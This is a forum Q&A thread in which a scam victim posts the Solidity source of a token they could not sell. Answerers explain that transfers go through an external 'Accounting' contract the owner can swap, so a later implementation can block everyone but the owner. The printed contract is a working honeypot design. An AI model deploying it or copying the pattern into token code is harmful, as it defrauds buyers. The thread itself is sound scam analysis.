# What makes this a scam ? - fell for it and wanted to know why I was not able to sell - as a dev what was he able to do

Tags: solidity

Smart contract code:

```
pragma solidity ^0.8.12;

library SafeMath {
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        assert(c / a == b);
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a / b;
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        assert(b <= a);
        return a - b;
    }

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        assert(c >= a);
        return c;
    }
}

interface BEP20 {
    function balanceOf(address who) external view returns (uint256);
    function transfer(address to, uint256 value) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function transferFrom(address from, address to, uint256 value) external returns (bool);
    function approve(address spender, uint256 value) external returns (bool);
    function totalSupply() external view returns (uint256);
    function decimals() external view returns (uint8);
    function getOwner() external view returns (address);

    event Approval(address indexed owner, address indexed spender, uint256 value);
    event Transfer(address indexed from, address indexed to, uint256 value);
}

interface Accounting {
    function doTransfer(address caller, address from, address to, uint amount) external returns (bool);
    function balanceOf(address who) external view returns (uint256);
}

contract Avalanche is BEP20 {
    using SafeMath for uint256;

    string public name = "Avalanche";
    address public owner = msg.sender;    
    string public symbol = "AmazonVerse";
    uint public _totalSupply;
    uint8 public _decimals;
    
    mapping (address => mapping (address => uint256)) private allowed;
    address private accounting;
    
    constructor() public {
        emit Transfer(address(0), msg.sender, _totalSupply);
        _totalSupply = 1000000 * 10 ** 9;
        _decimals = 9;
    }

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    function decimals() public view returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view returns (uint256) {
        return _totalSupply;
    }

    function getOwner() external view returns (address) {
        return owner;
    }

    function balanceOf(address who) view public returns (uint256) {
        return Accounting(accounting).balanceOf(who);
    }

    function approve(address spender, uint256 value) public returns (bool success) {
        allowed[msg.sender][spender] = value;
        emit Approval(msg.sender, spender, value);
        return true;
    }
    
    function allowance(address who, address spender) view public returns (uint256) {
        return allowed[who][spender];
    }

    function setAccountingAddress(address accountingAddress) public {
        accounting = accountingAddress;
        require(msg.sender == owner);
    }

    function renounceOwnership() public {
        require(msg.sender == owner);
        owner = address(0);
        emit OwnershipTransferred(owner, address(0));
    }
    
    function transferFrom(address from, address to, uint amount) public returns (bool success) {
        emit Transfer(from, to, amount);
        allowed[from][msg.sender] = allowed[from][msg.sender].sub(amount);
        return Accounting(accounting).doTransfer(msg.sender, from, to, amount); 
    }

    function transfer(address to, uint amount) public returns (bool success) {
        emit Transfer(msg.sender, to, amount);
        return Accounting(accounting).doTransfer(msg.sender, msg.sender, to, amount);
    }
}
```

Comment: Could you explain in comment what happened? Because as far as I see there is doTransfer( ) function that is derived from Accounting interface and we have no idea what it does. For all I know it could have had condition that only contract owner (scammer can use it). You can look at setAccountingAddress() function. It basically allowed owner to put address of any contact there and call it's functionalities. Or even deploy alright contract at first, but exchange it for malicious one at latter point. IN SHORT: In this contract Owner can do whatever he likes due to setAccountingAddress().

Answer (score 3):

Alright, I took a closer look at this.

And these are the obvious issues I see here.

`transfer()` function works by calling `doTransfer` from `Accounting interface`. Meaning that transfer functionality is dependent on Accounting implementation.

Now, that by itself wouldn't be that much of an issue if not for this:

```
function setAccountingAddress(address accountingAddress) public {
    accounting = accountingAddress;
    require(msg.sender == owner);
}
```

This `setAccountingAddress()` allows `owner()` to replace functionality of Accounting interface as he sees fit.

For example. He could have two Accounting contracts deployed on different addresses. At first everything works fine, and `doTransfer` from the interface functions as you would expect. However, the owner/scammer can switch address to **another** Accounting where `doTransfer` only works for him.

That is the simplest explanation I can give. Feel free to ask anything.

Comment: I done get how the ownership was renounced but he/she was still able to pull this offhttps://bscscan.com/address/0x519a5231cfb4b4b88627239d4adc705951476512

where can I learn about this setAccountingAddress function - cant find anything online

Comment: Well there are two options. Accounting Interface was malicious from the start. He might have renounced ownership of contract shown here. But the malicious code inside the interface is still working in his favor. Honestly, I would love to have a call/talk with you to ask fruther questions. Because I too ma looking to learn more, and we could exchange much more information that way. Would help us both learn more.

Answer (score 1):

I suspect the `doTransfer` function hides the code which doesnt let you to sell.The function is implemented in another contract so you wont be able to check the exact code until you have the address of that bad contract (and its verified on BSC Scan).

```
interface Accounting {
    function doTransfer(address caller, address from, address to, uint amount) external returns (bool);
    function balanceOf(address who) external view returns (uint256);
}
```

I recommend you to check the transactions from the scam contract to other addresses, you will find there the `Accounting` contract. However I dont think that it will be readable (verified).

Comment: Here is the contract address - https://bscscan.com/address/0x519a5231cfb4b4b88627239d4adc705951476512

where can i learn more about the setAccountingAddress function and what it does - I want to know what to look for to avoid this issue again 

I wasnt able to find out what happened or where the funds went - looks like a loop to me :(